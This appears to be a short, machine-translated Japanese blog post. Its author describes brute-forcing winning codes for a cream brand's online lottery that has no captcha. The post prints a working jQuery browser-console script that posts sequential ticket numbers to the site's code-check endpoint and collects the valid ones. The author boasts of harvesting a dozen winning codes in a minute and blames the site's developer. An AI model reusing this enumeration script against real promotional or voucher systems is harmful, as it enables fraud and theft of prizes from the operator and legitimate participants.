今晩、私はクリームのパケットを開き、コードが付いている小さなクルグリョーシカに気づきました。 一般に、私は通常そのようなイベントには参加しませんが、小さな勝利が私の目を引きました。つまり、「勝利コード」はFRIMA1234123のように見えました。 多くの読者が気づいたように、コードは基本的に7桁の10進数で構成されています。つまり、合計10,000,000の組み合わせがあります。
私が最初に思いついたのは 、コードを入力するサイトfrima.biz/lotteryにアクセスすることでした 。そこでは、コードをチェックするためにキャプチャが使用されていないことが判明しました。 検証のために通過するAJAXリクエストの簡単な検査により、JSONオブジェクトが応答として受信され、コードフィールドがあり、コードが存在する場合は0であることが示されました。
これに続いて、ブラウザコンソールを開き、次のコードを追加しました。
t = []; i = 1111111; q = function() { jQuery.post('/lottery?task=ajax&action=checkTicketNumber', { spoof_id: 1, frmname: '', frmemail: '', 'extra_field[1]': '', 'extra_field[2]': '', ticket_number: 'FRIMA'+i }, function(res) { if(JSON.parse(res).code == 0) { t.push(i); }; if(i < 1112222) { // 10 000 000 i += 1; q(); } }); }; q();
その後、いつでもコードの累積リストを取得できます。
console.log(t);
コードから、1111111で始まるすべての可能なコードを単純に通過することを推測するのは簡単です。1ダースのコードを1分間で受け取ることで、エゴを満足させ、ここに書くことにしました。
その結果、このWebサイトのフッターにこのハッキングの開発者として誇らしげに登録したTopWebDesign社を非難します。